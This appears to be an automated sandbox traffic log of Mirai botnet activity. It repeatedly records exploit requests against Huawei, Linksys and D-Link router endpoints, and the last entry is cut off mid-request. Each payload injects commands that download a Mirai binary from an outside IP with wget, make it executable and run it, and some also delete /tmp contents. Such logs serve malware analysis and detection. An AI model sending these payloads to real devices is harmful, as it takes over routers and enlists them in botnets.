| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 